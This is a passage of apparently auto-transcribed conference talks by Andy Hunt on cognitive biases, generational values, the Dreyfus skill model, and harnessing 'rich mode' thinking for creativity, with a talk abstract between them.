predict. And in Talib's book, he's like, okay, anything significant in history, this is what happens. It's always the big unexpected change that comes in. The title of the book comes from the idea that, you know, for many years scientists thought there was no such thing as a black swan. There was only white ones because they'd never seen one. And one comes trotting by and they're like, oh, would you look at that? Whoops. I've got to change that a bit. So why does this happen to us? Well, one of the ways the brain works is to reduce much of your input to a kind of symbolic representation. So this is coincidentally why none of us probably can draw very well. Right? So you're all programmers, tech people, right? Raise your hand if you're a great artist. Yeah, don't be shy. Go ahead. Come on. Yeah, right. No, it's not happening. Because we're so very good at manipulating and dealing with symbols. What happens is we're very good at symbolic reduction. So when you say, you know, draw a hand or even mention a hand, somewhere in your brain it's like, oh, hand, I know that. It's a stick with five lines. And you go to try to draw it and some part of your brain is shouting, what do you do with all these curves and shades and curves? It's a stick with five lines. And there you go. So of course what happens is in this reduced state in our brain, you lose all the detail. You lose all the nuances, all the context. And that's part of why we fail to see some of these big changes coming on the horizon. We just shrink the details up and then we don't have them to access. So, okay, that's all kind of bad. But these are structural things. These are processing things. There's not much you can do about it except kind of be aware of it. But there's worse things, I think, perhaps. There's things that affect the very core of our judgment and decision making. And this is largely because we still cling to this idea that this is the representation of human decision making, that we're logical, we're rational, we're thoughtful, we think things through, we make checklists. Unfortunately, that's really not a good model of human decision making. This is a lot closer to what's really going on. You've got the gibbering monkey brain inside of you going, wow, squirrel! And it's, you know, if you really want to down or read the book, Predictably Irrational, which goes through and catalogs an absurd number of ways that we just think the wrong thing, totally, all the time. But I want to talk here about something that's maybe less touched upon is things that influence our decision making. First one's kind of easy. You know, what's your basic personality? Are you the kind that values realism and common sense, probably? Or the kind that values imagination and innovation? They're different. Folks can come down on either end of that spectrum. Some folks will insist on fairness at all costs, even if it hurts them personally. Others are more into empathy and harmony. Some folks have to be quiet when they're thinking about it. You think about it in their head until the thought is fully formed, then it comes out at the meeting. Some folks like us, the jaw just flaps. It just comes out while I'm trying to form the thought. I sound like a gibbering moron in a meeting. Because it's well, you know, all this stuff's coming out. And the person sitting at the end just waiting, they won't say anything for an hour, then come out with some fully fledged thought that's like, well, that's really bright. Of course, they haven't said a bloody word for an hour, so it took some time to cook. Some folks genuinely just want to be told what to do. Just give me the step by step, I'll go through it, I'll go home, play World of Warcraft, life is good. Some of us think that's horrid. I don't want to follow a bloody list of steps. I want to figure it out for myself. All fine, all valid. It's baked in differently for each person. This is going to affect how you approach decision making. So along this line, you've got the Myers-Briggs personality types. And this is kind of an interesting look. You can be one of these four values. I'm not going to go through them in any detail, for reasons I'll explain in just a second. But if you look at the combination of values, you see some things that they put in these sort of classifications. You're a planner, you're a developer, you're an analyzer, a composer, you may be your promoter, motivator, explorer, strategist, this sort of stuff. Really kind of interesting different angles on how you might approach life and what your baked in philosophy is. There's only one problem with this. It's a bit like a horoscope in that you really can't fit human behavior into four bits. It's just kind of a difficult proposition. There is some value to it. And it's worth it. If you haven't taken one of those Myers-Briggs tests, it's always kind of interesting, but you have to realize this is a self-assessment. It's going to depend on your mood that day. Depends whether you answer with your work persona or your home persona. Maybe they're the same for you, maybe they're different. So it's a little bit fudgy, but it's kind of interesting to look at to see where your preferences may lie. But deeper than that comes with sort of what you value. Do you characterize yourself as a liberal, a conservative, an anarchist? Do you know how hard it was to find an anarchist logo? Just saying. That was less obvious than I thought it would be. But the problem is, okay, so you identify yourself one of these ways, right, conservative, liberal, what have you. But why? Were those your parents' values? Was that directly opposed to your parents' values? Were you just born that way? Yes. All the above. This can all happen. But what's interesting is, do you know what makes the biggest difference as to what kind of values you hold and how this works? It depends on who else was born the same time as you. Your cohort, your peers, your birthmates. The researchers who look into this kind of stuff say that you have more in common with somebody born at the same time who lives in Mexico City or Tokyo than you do with somebody right next door who is 10, 20 years older or younger. So the power of the cohort is really quite strong because of the sort of shared memories, habits, styles, significant events that happen. Depending on your age, you might remember where you were when the Vietnam War ended. I remember that. When Elvis died, when Reagan was shot, 9-11, all these sorts of major events that happen that your cohort will remember the same way. Because what happens is, if you're 20 and one of these events happens, you'll have one outlook on it. If you're 40 or 60, you're going to perceive that same event quite differently just because you had a different point in your life. So you and your cohort tend to view events in a very similar way. And that sort of drives us a bit. I love this poster here because this is the one where the young ones are like, wait, which Star Wars was that? There's no number. So what kind of differences can this bring about? Well, different generational groups, some are going to be much more prone to taking risks. Some will be very risk averse and not want to hear about it. Some will really value individualism. Others not so much. They favor more of a teamwork approach. Some value stability. Others put their faith in freedom and will accept a little chaos for that. Some focus on family. Other generations more on those to the grindstone work. So what's interesting is, according to such researchers, there's actually only four different kinds of generations and they repeat. So they did their research starting in Europe around the Renaissance and followed it over to the Americas. And in 20 generations of their study, there was only one gap in the pattern and that was in the American Civil War in the 1800s because we killed everybody. So there wasn't anyone there to kind of take their place in society as they would have normally. Other than that gap, they found this very regular repeating pattern of four archetypes. You have a profit generation, a nomad, a hero, and an artist. And in general, I'll give the caveat in generalities in just a second, the profit generation values values, values vision. The nomad, not so much into that, they value their liberty, their survival, their honor. Or if you'd in Klingon, their honor. The hero generation, much more into community, into affluence. Let's share all this together. The artist, pluralism, expertise, do process, do it by the numbers. So they mapped this out onto the last couple generations and tacked cute little names on them because that makes for good press. So you have the GI generation, which was a hero generation, people born back around the turn of the previous century. The silent generation after that, an artist generation. The baby boomers, the boom generation, a profit. Generation X, the nomads, millennials, back to hero again, and then the newest homeland generation back to the artist. So a couple things here. First of all, a caveat. When you talk about a generation of people having this particular characteristic, it does not mean that everyone born at this time thinks this way. What it means is that if you take on the aggregate a whole bunch of people, the folks born in this bucket will tend to share these values and these outlooks, more than people on any other adjacent one. The dates are not firm. They're kind of, yeah, about then. So you can be born on a cuspier and you might feel partly this way, partly that way. These things happen. That's okay. But here's a question. Why does the cycle only go for four generations? Why does it then repeat? Well, that's kind of an interesting thing to ponder about. You probably knew your parents pretty well in most cases. You probably knew your grandparents, at least to some degree. What do you know about your great-grandparents? The names, where they lived? What about their parents? Anything? Anything? If you're lucky, maybe you've got a family tree, you can pluck some names out, but you really have no experience of what their lives were like. So what happens after four generations kind of passes out of memory? Now, it'll be interesting to see if this changes. Now that you've got Facebook recording everything and NSA making a backup copy. Great. For archival, it's wonderful. Really, we've got archival copies of everything. I don't have to worry now. But this kind of thing kind of falls out of human memory. Once we start keeping all that and you can go back and look at great grandma's Facebook posts, is that going to change the cycle any? I don't know. It'll be interesting to see. So given the last couple generations that have happened here, you start off, you've got the GI and silent generations very hip on a very military metaphor. Business and military was conducted on command and control. The focus was more on process rather than necessarily on action. The idea is that, oh, you just have, you know, as long as you've got a good process, as long as you follow it, it'll just turn out okay. Because the faith is in the process, not necessarily the outcomes. These folks are now in what? They're 60s, they're 80s. These would be the elder statesmen of any industry, any generation. And this is where they're coming from. Next, you've got up the baby boomers. This was a profit generation. They wanted to save the world, collect the whole set. Again, less interested in outcome than approach a tendency to what some other generations might call moralizing or preachy. Because they're all about their values and do this and do that. It's like, well, yeah, okay. But then you get generation X. What some say raised by wolves. This was the greatest entrepreneurial generation in history. But rejects labeling. They have no logo. I want no stinkin' logo. When interviewed in these kinds of studies, they don't identify themselves as Gen X. They identify themselves as not a boomer and not a millennial. Which is kind of interesting. If there's a problem, they'll quit and move on. I ain't fooling with this. Folks from other generations will take different views of it. Well, someone should fix this. Well, I ought to fix this. Whatever. There's different viewpoints. This group will be like, saw it. Move on. Next. Fiercely. Fiercely individualistic. Then you get down to those kids today, get off my lawn. The millennials. They plan ahead, bless their little hearts. Much more upbeat, much more team and community oriented. They're not going to save the world so much. They've got this more of an attitude of, well, somebody in charge should fix this. Kids, I got news for you. You'll find out. So these things kind of go through and cycle and repeat. Now, what I find interesting just from a software development point of view is if you look at the older generations, you see a much greater emphasis on rigid hierarchies and a just hell bent for leather focus on process. You've got to do these steps in this order. Then that moves on to the more GeneXus, oh, just do it. Individualism. I'm okay. Bad luck to you, but just do it. Then a move into the more recent generations. Well, let's get everybody involved. Let's get the team involved. This is more of a community thing. Could it be that one of the reasons that open source is exploding so much is because a different generation is coming up to do it, where they treasure that kind of interaction more than us old fogies? Perhaps. Interesting to think about. But there's a definite parallel here to methodologies as they come down and how we develop software as reflecting the values of whatever generation is kind of moving through. Now, this makes it particularly interesting because at the moment, we've got more generations in play in the workforce than ever before. You got everybody's got their hand at. The poor old folks can't retire because they're not enough money and the young folks are desperately trying to get money for college. You got everybody in the mix, which makes it really quite interesting. So these are things that can subtly affect your approach and your decision making that you're probably not consciously aware of. One more topic I want to go into. That's about skills themselves. Back in the 80s, the brothers Dreyfus, Stuart and Hubert, wanted to research artificial intelligence because they wanted to build an artificial intelligence that would learn skills the same way that humans did. I thought this would be a dynamite idea. Only one problem. They had no idea how humans learned skills. So they had to research that first. They never got around to the AI part particularly. But they did come up with this idea of the Dreyfus model of skill acquisition. What happens is you start off anything as a novice with no experience and work your way up toward expert. And along the way, a lot of things change. The biggest thing they discovered was that as an expert, you're not just a really smart beginner. You fundamentally perceive the world differently. You approach problem solving differently. You value different things. Your decision making process is different. The whole thing is different and gets that way as you climb up the ladder. Let's take a quick look at the stages in the Dreyfus model. Stage one, predictable. You have no experience. You don't really want to learn. You just want to get it done. You don't know how to respond to mistakes and so are vulnerable to confusion. If I'm learning a new programming language, I'm there. This is it. I just want to get this done. What do you mean there's no loops in this language? You have to use recursion. Fine. Okay. Then the compiler spits out, blah, blah, blah. I have no idea what that means. It could mean a permission problem on my installation. It could mean I left off a bloody semicolon. No idea. I'm at a novice level at this particular skill. The only way you can succeed as a novice is if you're given context free rules. When this happens, do that. This is how call centers are able to operate with people answering the phones who really have no domain knowledge. They're novices in the field, but there's a decision tree. My computer doesn't work. Is it plugged in? Yes, no. They go down the tree. You've got rules. Note on the word experience here. Experience in this context means I've done something and I've learned from it. So by that definition, I've filed my taxes for 30 years now. I have no practical experience at it. I'm still a novice. I still don't care. I just want to accomplish a goal. I don't know how to respond to mistakes. The tax service sends me this big yellow letter yelling at me and I have no idea what they're on about. I send it to the accountant. You have to give me context free rules like take all your money, send it in. Okay. That seems about right. So novices need recipes. They need to know, okay, I do this, then I do that. And then you can go on from there. Stage two, you grow up a little bit. You can start trying things on your own that are off the recipe card. There's still difficulty troubleshooting because you've got no sense of the big picture yet, no mental models to work with. You want information faster now. So you're learning a new language. It's like, oh, okay, I want this thing out of their standard library. Where is it? Where is it? That one. Yeah, okay. Wrong one. Okay. It's frustrating because you kind of want to suck the information in very fast. You can begin to follow someone else's advice a little bit but not great yet. Again, you don't have that overall understanding. And worse than that, you don't want the big picture. The big picture at this point in time would just be confusing to you. And you see this problem sometimes in like large corporate meetings where they have an all hands meeting and the sales guy gets up and he's talking about sales things and you're like, oh, just gnaw my leg off and get me out of here. I don't care about this because you are a novice or advanced beginner at that particular topic. So it really doesn't make sense to you. It's just frustrating and annoying. Then we get up to competent. All right, now we're starting to get some traction. At this level, and now for the first time, you begin to develop conceptual models of the topic area. You begin to understand that programming language. When a syntax error comes up, it's like, oh, that's because it's parsing the line like this and it didn't see my comma, semicolon, whatever it was. You can start to troubleshoot problems now that you've got a bit of a model. So the big leap when you get to step three is that you can start to troubleshoot. And that's important. Now we start getting into the real fun. You get up to proficiency. Now you really have to understand the big model. You want to understand the larger framework. You get very frustrated with oversimplified information. You call up that helpline and say, I'm getting a blue screen at death because of this new device driver I just compiled and they say, is it plugged in, sir? Punch him right through the phone. You can self-correct previous poor task performance. Now this is important. This is only at level four. And one of the things that an agile process says is you should learn from your mistakes and correct them. That's dynamite if you're a level four practitioner. Less than that, you need help. You need a coach. You need a mentor. You need somebody who knows what they're doing because you don't have the skill to do it yet. Level four, you do. You can learn from the experience of others. You can understand and apply maxims, proverbs, fundamental pithy sayings that make sense to you in this context. For instance, an XP says test everything that could possibly break. Dynamite, great advice if you know what it means. If you're a beginner, what can break? Hell, everything. Getters and setters could break. Log statements could break. I wrote it. Everything could possibly break. Up the chain a bit, it's like, okay, you're not going to bother with the stupid stuff, but this big hairy calculation where there's an even odd and a divide. I know I'm not going to get that right. Okay. I know my strengths and weaknesses. I know what's likely to break and what's not from my experience. If you're less experienced, you just don't know. And this is where you get into trouble with things like design patterns. For example, a gang of four book comes out and documents the, what was it, 24, 27, 23 design patterns. And experienced people are like, okay, I recognize this is kind of cool. These are patterns that make up for deficiencies in the C++ language that was popular at the time. If you had a real language, you don't need half of these. But that's fine. And everyone else is like, wow, recipes. So true story, I knew this guy on a project, he was writing this little bit of report writer code. He just read the design patterns book. And in this hapless little piece of code, he wedged in something like 19 out of the 23 design patterns because he could. This also, by the way, is why you really want to do code reviews or pair programming. So proficient practitioners can self-correct. That's important. Now we get to the end of the line, we get to the expert. These become the primary sources of knowledge and information looking for new and better methods. Interestingly, experts work from intuition far more than reason. You know, you look at this design, is my design good? No, it sucks. Why? It just does. They know it. They're correct. But they're often very inarticulate about how they arrived at decisions. The doctor looks at you and is like, oh, you've got such and such syndrome. And they'll run the tests and you're right. How did you know? I don't know. He looked wrong. It's just, it's so ingrained. It's so baked in, I can't really articulate it. Also, if you force the expert to follow the rules that you set down for the novices, you drag their performance down to the novice. And they actually did this experiment with airline pilots and showed very conclusively that you wreck expertise by making it follow the rules because experts need to rely on their intuition. So you've got this overall movement from rules to intuition, from considering everything to being able to narrow down to relevant focus, and even such things as a novice will consider themselves over here and the project over there. It's sort of detached from it. The expert understands systems thinking and systems and realizes that they are a part of the system. Everyone on the team is a part of the system. That's a part of the company. It's all interrelated and reacted. So they're much more aware of that kind of viewpoint. Whereas the beginner, not so much. So how you approach problem solving, how you view these things, the decisions you make here, changes depending on your skill level. So even if you've figured out, okay, I'm a left leaning liberal who likes dogs and cats and whatever else from all that other stuff and my personality wants me to do this and whatnot, that's dynamite. That's all going to change. It changes as you gain skill, changes as you get older. So I leave you in a bit of a quandary then. Your brain's really messed up. What are you going to do about it? Oh, my, look at the time. Okay. Well, so we'll just go now. You want to, where possible, and as you get up the expertise ladder in some particular skill, you want to be able to start off with intuition. Once you have enough skill where you can rely on that, you want to start with that, but you can't stop there. You have to verify it. And this is where some experts get into trouble. They get so used to relying on their intuition, facts change. Things change underneath them. You experience that change blindness that we saw with the gradual change studies and the gorilla and the curtain and all of that. And so they begin to rely on their intuition and forget to actually verify it and run into trouble. So we want to actually, where we can, place our trust in actual outcomes. Did the project succeed? Did the code work? Are we actually doing the right thing? And not trust to process alone or metrics or wishful thinking, which is our most popular way. We get the wonderful four side cartoon where they realize, it's time we face reality, my friends, we're not exactly rocket scientists. They look at, they've got the lab coats, they got the little clipboards, but look at the outcome. The outcome didn't make it. It is, he says with a pun, critically important to apply critical thinking. And I think in general, we're lazy and we just don't do this enough. We jump to conclusions, we make assumptions and we tend to ignore actual facts. You know, actual facts become, well, I read it on the internet, you know, it was on Reddit, it must be true. And this is a problem. We need to be better at observing something without bias, actually research statements. You know, I wish, I honestly wish that every time somebody hit the post button on Facebook, it would automatically like search through snopes.com and if there's a match, say, no, you just can't post that. It's stupid, it's a rumor, it's not real, stop posting it. You know, this kind of thing. Look for credible sources if they be any of these days and ask why. This is the favorite consultants trick, right? You get into a situation and it's like, you know, there's oil on the floor in the factory. Why? Well, something must be leaking. Okay, why? Now they're stumped. They go back, you get to five whys later. Well, purchasing had to buy this kind of seal because of this corporate directive and because of that and this and this, you go back and you find out the entire factory's got the wrong size seals in the ductwork because of some stupid PO memo that went through two years ago. Alright? Never stop at one why. Keep going and going and going like a frustrated three-year-old, but why, daddy, until you get to the end and actually get to the root of the problem? And ask yourself when you find yourself pontificating that, you know, Java is dead or Oracle is dead or everybody's programming in Ruby or nobody's programming in Ruby or Elixir is the next hot thing or it's not, whatever your position, first ask yourself, okay, great. How do you know? You know, says who? Are they credible? What are they basing it on? How specifically? What is dead dead? No adoption, less adoption? Kick to the rubbish bin of history? How specifically? So on and so on. And there's some really interesting penetrating questions you can ask yourself. Like what would happen if you did do something you didn't think you should do? What would happen if you didn't do something you thought you were supposed to do? Well, my personal favorite, what stops you from? And this was an actual exchange I had with someone a number of years ago. Said, ask that question. What's stopping you? Nothing, I answered. That gets in my way a lot too. With that in a few minutes for questions, I want to thank you all for coming. My email address, my Twitter handle, link to my book, Pragmatic Thinking and Learning that covers a lot of this kind of material. Thank you all very much. And before I let you go or entertain any questions, I am bade to remind you to put your little cards in. This is a yellow card. It's a bad example. Green cards. You want to put the green cards in the bucket outside to evaluate the talk. Feedback or comments may be written on the cards if you've got really tiny handwriting. So please do that for our good hosts. And are there any questions? Good. All right. Go get cookies and coffee. Thanks again.
|
We make important decisions and try and solve critical problems everyday. But our decisions and problem solving is based on faulty memory and our emotional state at the time. Join Andy Hunt and explore common cognitive biases which can dramatically affect your decision making and problem solving skills. You'll learn why most predictions are wrong from the start. Together we'll look at aspects of context which can subtly affect you, including your own brain's legacy hardware, and how to recognize and stop that when it happens.
|
10.5446/51540 (DOI)
|
Can you hear me in the front? Can you hear me over the babble down there? Okay, so I can babble up here. That's good. All right. How are y'all doing this morning? Waiting for that coffee to kick in. You all got your coffee? You good? You good? You ready to go? You're not going to nod off on me first thing? Okay. I still have jet lag, so I might nod off, but that's okay. Well, it's a pleasure to be here today. It's really exciting to be up here talking to you on this little tiny platform wiggling by four tiny wires. Great start to the day. Just a warning in the front row, if this starts to go, I am headed your way. Other than that, we should be fine. So today, I'm going to talk about, I got three talks today. This first one is on mining your creativity or mining your creative mind. And that's mostly what I'm going to talk about, but I've got a couple other things I have to talk about sort of first and after around that. A lot of these ideas came from a book I wrote a couple years ago, Pragmatic Thinking and Learning, my seventh as it turned out. But these are the topics that I covered in the book. Unfortunately, I don't have time to go over all of these today. And if you'd like a copy of this mind map of what's in the book, you can download that from that URL. And that just gives kind of an overview of the sort of topics that are interesting to me at least in this kind of area. So first off, I want to talk about a few bits of kind of background information. Three things in particular. I want to talk about context, patterns, and neuroplasticity. One of my favorite words. I'll start off with context. If I asked you to draw a tree or think of a tree, what's the Norwegian word for tree? Okay. If I asked you to think of one of those, odds are you or ask you to draw it, you would think or draw of something sort of like this. This represents the absolute pinnacle of my artistic talent. That's as good as it gets as far as it goes. And this is how we tend to think of things. This is how our brain tends to organize things. You say tree, we think of this sort of very limited, very symbolic representation of it. The danger is that that does not in any way represent what's interesting about a tree. A tree in fact isn't an object. It's not even a system. It's a set of interreacting systems that all meet in this thing that we call a tree. You've got the whole respiration cycle with the leaves and the air and the carbon dioxide. You've got the Krebs cycle, the nitrogen cycle in the soil. You've got the overall life cycle of the tree. As it grows, it dies. The stuff rots, becomes part of the soil. It goes back around again. There's all these different cycles and systems and processes, interreacting and interrelating, and that's what makes a tree. We hit this in software sort of all the time. You think of the project as just this thing, but it's not. You think of the team as just a thing, but it's not. It's like this. There are a bunch of systems that all interact with each other. One of the things I exhort people, I urge people to always bear in mind is that you always have to be aware of the context. A tree doesn't just stand by itself. Neither do you, your project, your code. It's all part of some system. The context matters a great deal, as we'll see in just a moment. The other thing that I find interesting about how the brain works is patterns. This was pair programming in the good old days, just if you were curious. Interesting thing about pair programming, we tend to refer to it as you've got the driver, the person sitting there typing, and the navigator, the person sitting back and free to observe differences in the system and see patterns in the code, differences in the project, and see these kind of higher level things. It's interesting that there's actually good cognitive research that says the person who's not typing can actually see those patterns emerging in the code. The person who is typing cannot see them, just by the way the brain works. We'll look at that in a little tiny bit. It's interesting to see that even on some simple XP practice such as pair programming, there's demonstrative cognitive help there. It's a good thing to do. You can get advantage from that. This idea of being able to see patterns and being able to recognize patterns is one of the hallmarks of expertise. This is something you see in expert doctors or firemen or airline pilots or what have you. This whole idea of pattern matching, pattern seeking is kind of interesting. The last thing I want to cover just to sort of background sort of things is this idea of neuroplasticity. This is kind of a funny story. For many years, many, many years, it was assumed and taught that you had a fixed number of neurons in the adult brain. Once you got to that number, that was it. You couldn't grow anymore. You weren't getting new ones. Sadly, they also said that beer and wine would kill neurons. This was a really bad combination. You're kind of just going for a net loss as life goes on. Turns out that's not true. You actually do grow new neurons in your adult life, quite a few if you need to. They've done studies on London taxi cab drivers and they've got a huge concentration of neurons that were grown specifically to memorize the routes that they have to take as taxi drivers. If you're a piano player, you've got a whole bunch of neurons that were dedicated to the purpose of memorizing scales and these sorts of things. What actually happens is there's a battle for cortical real estate in your brain. Whatever you do the most of, your brain will reconfigure itself to accommodate that. If need be, it will grow new neurons and dispose of some of those old drunk ones in the corner. It doesn't need anymore. A little garbage collection. Just get rid of those. The punchline, the funny part about the story is for decades, the researchers got this wrong. They thought that you did not grow new neurons. The reason that they thought that is actually even more interesting than the fact that you grow neurons. They would do their laboratory tests with primates in a sterile lab environment, sort of like a gray cubicle. If you want to think about that way. In that environment, sort of sensory deprivation, these primates are used to being out on vines in the jungle with color and scents and leaves and predators and all kinds of sensory stimulation. You stick them in a cage or cubicle without much sensory input and you don't grow new neurons. You might as well be sitting there watching the voice or something or Norway's got talent. You have whatever, something. You won't grow new neurons under those circumstances. This brings us back to the idea of context. They got the wrong results by studying the animal outside of its native context. They decontextualized it. You take it out of context, you get the wrong idea about it and they were wrong for decades about this. So, point one, context is utterly important for whatever we're going to talk about. Point two, what you think and how you think it can physically change your brain. Physically, it will grow new neurons, dispose of old ones, reroute pathways, get rid of old information, reorganize new stuff. It is a self-modifying machine which makes it kind of tricky to talk about. But we're going to try anyway. So, when we try, when I'm, the stuff I'm going to talk about today, when talking about the brain, I'm going to use a very grotesquely oversimplified analogy. And invariably, somebody comes up afterwards and says, the brain doesn't really work that way. And it's like, no, of course it doesn't. This is a very simple picture. Your brain doesn't work like this. But it's a helpful way to kind of think about it and certainly to talk about it. So imagine, as a metaphor, imagine if you will, that your brain is kind of like a computer. And if it were a computer, it's not, if it were, you could picture it as a dual CPU shared bus design. So, what that means is you've got memory sitting up here. You've got a shared bus to these two CPUs. You've got this CPU on the left, which functions as kind of like a very traditional van Neumann processor. Step by step, this instruction, then the next, do this, do the next thing, do the other thing. That little voice in your head that you, you, you kind of chat to yourself, that comes from over here. Hopefully you only have the one little voice. If you've got more than that, then you've got some kind of like multi-process here design. I don't know what's going on with that. But this is very linear and very slow. This part, this, this style of processing that your brain does over here is what we're calling the CPU one runs at about 110 bits per second, about the speed of speech. It's relatively slow. This other CPU over here is quite different. It's more like a magical digital signal processor. It's like this kind of magic, you know, graphics chip or DSP chip. It is blazingly fast. It is not linear. You cannot order it to do anything. It is asynchronous. You give it a job, it goes off in the background, putters around for a while, and sometime later, the results get delivered asynchronously. You notice that CPU one is conveniently on your left. And CPU two is on your right. And back in the 60s, they actually referred to this as left brain and right brain. Turns out, as with most things in the brain, it's not that simple. It doesn't actually even really work that way. But you'll see it often times in the literature that talk about right brain thinking and left brain thinking, and that's kind of hooey. There's really no such thing in that sense, what you have actually are more this style of processing and this style of processing that different areas in the brain will light up and activate depending on the task at hand. So if you think of these as sort of modes instead of physical hemispheres, we'll talk about it as L mode for linear mode and R mode for rich mode, and that's slightly more accurate than getting into the old fashioned left brain, right brain thing. So if we look at this, this CPU one, left mode of thinking, these are very familiar traits that this style of processing happens in your brain. This is where you get generation of language, analysis, symbolic representation, you know, very logical, very linear. This is what we're all very accustomed to in our day jobs, yes? This looks familiar, comfortable? But it's very slow. Then you got this other thing happening over here. And that is quite different. This rich mode is not verbal. It can't generate language. It is non-rational. Oh, I was stepping on some toes here. Non-rational is bordering on insulting, right? You get an argument with your significant other. You're not being rational, okay? Probably not. Interestingly enough, if you do go back to sort of geography of the brain, this R mode is like 80% of your brain's processing power. That linear mode, that L mode that we talk about is much smaller, 10 to 20% perhaps. This is the bulk of what's going on. And this is very different. This is where intuition comes from. This is much more holistic thinking, looking at things as a whole. Again, going back to that idea of looking at things as systems, non-verbal. This side, this processing style likes to learn by synthesis instead of analysis. So in L mode, you're used to analysis. You take something, you pick it apart, you look at the parts, you analyze it. This side, this mode wants to learn by synthesizing, by putting things together. This is what, well, let me build a prototype. Let me write a couple lines of code. Let me build something. Let me try something. That learning by synthesis is associated with this side of the world. So this is kind of interesting. This is also where your inner search engine comes from. So if I asked you some trivia question, some sports question or rock music or what have you, and you know you know it, but you can't think of the answer right off, this will sort of submit a batch job in the background and go look through memory until it finds it. Now, there's a problem with these two modes of processing. They fight with each other a bit. One blocks out the other and they fight over memory. They can't both access memory sort of at the same time. Have you ever had that experience where you've had a very vivid dream and you wake up and you can remember every detail crystal clear and what happens is you try to describe it to someone, right? It gets harder and harder to remember. It kind of evaporates. Well, that's this kind of like bus contention, for lack of a better word, between these two modes. One side generated the visual imagery of the dream and now you're trying to use the other mode to describe it by generating language and they're not really cooperating quite in the way that you want. So here's an interesting little illustration of these different processing modes at work. This is a gif of a rotating girl dancing, dancer. Raise your hand if you see it going clockwise. Raise your hand if you see it going counterclockwise. All right. So hands back for the clockwise folks. Think to yourself as you're looking at this, you know, do some math facts for me. What's the square root of 256? 16. What's 16 plus 4? 20. What's 20 divided by 2? Is the girl changing yet? What's 2 plus 6? Well, it's too simple for them. What's 16 squared? All right. Has it switched for anyone yet? Okay. Let's try the other people then. For the folks who see it going counterclockwise, picture yourself on a nice beach with azure blue skies and calm waters and the beautiful crystal and surf and the sand. Really picture that. Is she changing yet? They're just not going to admit it or no one's awake yet. In theory, okay, has this changed direction for anybody? Okay. Some people. The girl actually is not. You can look at the individual frames of the gif and you cannot tell which way the figure's moving. It's only like six frames to the gif and none of them give a particular spatial cue as to which way it's going. So whether you perceive it as rotating clockwise or counterclockwise, that's all in your perception. And your perception will vary depending what mode of processing is more dominant in your head at this particular time. If you concentrate on difficult math facts or something sort of linear, something l-modish like that, it will spin, make sure I get this right, counterclockwise. If your right mode is more dominant at the moment, the rich mode more dominant, it's going to spin the other way. It's going to spin clockwise. And sometimes you're not even consciously aware of a switch. You can be sitting here looking at this and suddenly it starts going the other way or back or forward. Now, some people, I can make it go. You can just chat with them and give them some math or give them some imagery and you can make it turn. It probably doesn't work first thing in the morning, but give it a shot. You can find this on the web. But it's just kind of interesting. There's another thing you can do with rotating your foot, whether it goes clockwise or counterclockwise. And it's driven off the same sort of principle. So there's some kind of weird stuff going on in your head there. What we'd like to do is try to capitalize on that. Try to capitalize on these kind of strange, pre-conscious processes that we're not really aware of and harness that to our advantage. I talked about dreaming for. You know the story of how the sewing machine got invented? This was kind of wild. This fellow, Elias Howe, in 1845, was it? Yeah. He was trying very hard to invent the first powered sewing machine. And he was having a lot of trouble trying to figure out how to get the needle to do what a needle has to do in a sewing machine. Go down, go back up, tie the loop. I don't know how to sew. Whatever it is it does. He was having trouble with this. And he's working in his lab trying to invent this, trying to get it to happen. It's not happening for him. So one night he has this terrifying nightmare. He's being chased through the jungle by headhunters, the kinds with spears, not like human resources. That would really be frightening. So he's got these headhunters chasing after him with the spears. And he wakes up in a cold sweat. He's trying to describe the dream as best he can while he can still remember it. And he remembers this strange detail. He said, you know, it was all like what you would see in, you know, National Geographic or whatever they had at the time. But the spears looked really weird. They looked like kind of normal spears, but they had a hole in the tip. Almost like you could pass a string through it. Ah. And he solves the problem of the sewing machine. A regular sewing needle, I'm told, has the hole at the back for the thread. A machine needle has it at the tip. And that was his big insight that led him to develop the sewing machine, which he got a patent for in the U.S. in 1845. So what happened here? Well, he'd been doing the experiments. He'd been working on this stuff. And somewhere in that gray gooey mass that was his brain, somewhere was the flash of insight, the idea, the notion that, hey, you need to put the hole at the other end. That's the secret. Or at least something to try. It's a good idea. But he wasn't aware of this consciously. This was just kind of brewing in the soup up here. So what happens is this R-mode processing has this idea, but how does it get it to you? The R-mode can't generate language, but it can generate visuals. So you get the nightmare. You get the dream with this kind of weird little feature in it that if you pay attention, it's like, aha, it's a clue. A clue. My brain is trying to give me. So it turns out there's some stuff like this that you can kind of capitalize on and try and take advantage of it. This goes in order from the weirder and less supported to the more concrete and absolutely works. We'll start on the weirder side. There's a fellow who claims image streaming is a really good technique. And I've had people from talks tell me this works great for them. Your mileage may vary. But the way this works, you start off, you want to ask yourself a question or pose yourself a problem and close your eyes. This is great to do at work. Put your feet up on the desk, close your eyes for a little bit. And typically you'll see an image float across your screen of vision, your imagination. So what you want to do, first of all, is describe it out loud. Actually using your voice. Don't just say the words in your head because that activates different neural pathways. You actually want to use your voice to describe it. So just to get the picture here, you've got your eye closed at work with your feet on the desk and you're talking to yourself. Regardless of that, whatever the thing you saw, try to imagine it with all five senses, if possible, or at least as many senses as possible. Your brain, at one point, is kind of stupid. If you describe an image, even if it was fleeting, you saw some image, something and it's gone, if you start to describe it in present tense, it says if your brain's like, oh, that's still here. It's still around. It kind of drags it back a bit. The same thing with imagining it in multiple senses by activating these different sensory pathways, you kind of build a deeper connection to it. You kind of hook on to it a little bit better and describe it in present tense even if the image is gone for the same reason. And if you start doing this for a while, you start to, you know, it's not quite lucid dreaming, but it's something along those lines where you start noticing things that maybe your brain's trying to tell you, that are percolating in your pre-conscious soup. Some percentage of the population, 10, 20%, could do this all day long and never see an image. Just not wired that way. You can stare at a bright light, rub your eyes, get the phosphine effect, go stare at the sun. No, didn't say that. Something like that. And it's sort of the same idea. The source of the image isn't particularly important. It's your brain's struggle to interpret it. That's where the fun comes in as your brain tries to figure out what is this weird scene that I'm seeing here. Another way of kind of tackling this problem is just free form journaling or writing. And this is an interesting thing just in the number of strange places I've seen this idea pop up. I have seen this in executive retreats, in masters and business administration courses, master's courses. You see it in author retreats and author writing workshops. And the idea is you get up first thing in the morning before having coffee, before having a shower, before reading Twitter, before Reddit, before anything. And the very first thing you do is write out three pages of whatever longhand with an old fashioned pen or pencil. Not typing. We'll see why in a bit. You write out a couple pages longhand and don't censor anything. Whatever stupid idea comes up, just jot it down and do it religiously and do it every day. So in one of the executive retreats, they pulled this technique out. And one of the CEOs is like, I paid money for this course. Are you kidding me? This is the stupidest thing I ever heard of. They're like, well, just do it anyway. He's like, okay, I got nothing to say. Like, fine, just write out for three pages. I have nothing to say. So he does. He writes out that. This goes on for a couple days. Week later, he comes back and says, you 